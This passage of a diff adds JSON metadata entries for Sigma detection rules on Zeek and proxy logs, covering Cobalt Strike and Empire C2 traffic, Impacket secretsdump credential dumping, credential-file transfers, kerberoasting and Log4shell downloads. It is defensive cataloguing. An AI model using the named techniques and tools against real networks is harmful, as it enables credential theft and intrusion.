This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2018/11/28", + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "author": "OTR (Open Threat Research), @neu5ron", + "level": "medium", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate", + "meta": { + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.s0154" + ], + "creation_date": "2021/06/23", + "filename": "zeek_default_cobalt_strike_certificate.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "uuid": 
"bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ], + "creation_date": "2021/08/19", + "filename": "zeek_dns_mining_pools.yml", + "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", + "level": "low", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for a DNS request to the ma>", + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection", + "meta": { + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/Maka8ka/NGLite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/04/21", + "filename": "zeek_dns_nkn.yml", + "author": "Michael Portera (@mportatoes)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set", + "meta": { + "refs": [ + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" + 
], + "tags": [ + "attack.t1095", + "attack.t1571", + "attack.command_and_control" + ], + "creation_date": "2021/05/04", + "filename": "zeek_dns_susp_zbit_flag.yml", + "author": "@neu5ron, SOC Prime Team, Corelight", + "level": "medium", + "falsepositive": [ + "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ], + "creation_date": "2021/08/15", + "filename": "zeek_dns_torproxy.yml", + "author": "Saw Winn Naung , Azure-Sentinel", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav", + "meta": { + "refs": [ + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/05/01", + "filename": "zeek_http_executable_download_from_webdav.yml", + "author": "SOC Prime, Adam Swan", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. 
Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ], + "creation_date": "2021/09/20", + "filename": "zeek_http_omigod_no_auth_rce.yml", + "author": "Nate Guagenti (neu5ron)", + "level": "high", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. 
This could be an indicator of exfiltration.", + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/05/02", + "filename": "zeek_http_webdav_put_request.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ], + "creation_date": "2020/08/22", + "filename": "zeek_rdp_public_listener.yml", + "author": "Josh Brower @DefensiveDepth", + "level": "high", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." 
+ ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ], + "creation_date": "2020/04/03", + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "author": "Samir Bousseaden, @neu5rn", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL. 
Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", + "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", + "value": "Possible Impacket SecretDump Remote Activity - Zeek", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ], + "creation_date": "2020/03/19", + "filename": "zeek_smb_converted_win_impacket_secretdump.yml", + "author": "Samir Bousseaden, @neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "level": "high", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different 
psexec client other than sysinternal one", + "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", + "value": "Suspicious PsExec Execution - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_susp_psexec.yml", + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects known sensitive file extensions via Zeek", + "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", + "value": "Suspicious Access to Sensitive File Extensions - Zeek", + "meta": { + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", + "author": "Samir Bousseaden, @neu5ron", + "level": "medium", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", + "value": "Transferring Files with Credential Data via Network Shares - Zeek", + "meta": { + 
"refs": [ + "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ], + "creation_date": "2020/04/02", + "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", + "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption", + "meta": { + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2020/02/12", + "filename": "zeek_susp_kerberos_rc4.yml", + "author": "sigma", + "level": "medium", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check", + "meta": { + "refs": [ + "https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + 
], + "tags": [ + "attack.discovery", + "attack.t1590" + ], + "creation_date": "2022/08/14", + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "author": "Axel Olsson", + "level": "medium", + "falsepositive": [ + "Legitimate use by administrators" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent", + "meta": { + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2019/11/12", + "filename": "proxy_apt40.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Old browsers" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern", + "meta": { + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2021/02/08", + "filename": "proxy_apt_domestic_kitten.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern", + "meta": { + "refs": [ + 
"https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2021/06/09", + "filename": "proxy_baby_shark.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": "Chafer Malware URL Pattern", + "meta": { + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/01/31", + "filename": "proxy_chafer_malware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable Amazon Profile", + "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", + "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_amazon.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + 
"logsource.product": "No established product" + } + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles", + "meta": { + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2021/05/06", + "filename": "proxy_cobalt_malformed_uas.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_ocsp.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Malleable OneDrive Profile", + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile", + "meta": { + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_cobalt_onedrive.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects WebDav DownloadCradle", + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent", + "meta": { + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2018/04/06", + "filename": "proxy_downloadcradle_webdav.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts", + "meta": { + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ], + "creation_date": "2017/11/08", + "filename": "proxy_download_susp_dyndns.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Software downloads" + ], + 
"logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD", + "meta": { + "refs": [ + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ], + "creation_date": "2017/11/07", + "filename": "proxy_download_susp_tlds_blacklist.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "All kinds of software downloads" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ], + "creation_date": "2017/03/13", + "filename": "proxy_download_susp_tlds_whitelist.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "All kind of software downloads" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo", + "meta": { + "refs": [ + 
"https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2020/07/13", + "filename": "proxy_empire_ua_uri_combos.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent", + "meta": { + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_empty_ua.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects URL pattern used by iOS Implant", + "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern", + "meta": { + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ], + "creation_date": "2019/08/30", + "filename": "proxy_ios_implant.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download", + "meta": { + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ], + "creation_date": "2021/12/21", + "filename": "proxy_java_class_download.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Windows PowerShell Web Access", + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent", + "meta": { + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/03/13", + "filename": "proxy_powershell_ua.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access", + "meta": { + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + 
], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ], + "creation_date": "2020/04/15", + "filename": "proxy_pwndrop.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ], + "creation_date": "2019/12/05", + "filename": "proxy_raw_paste_service_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "User activity (e.g. 
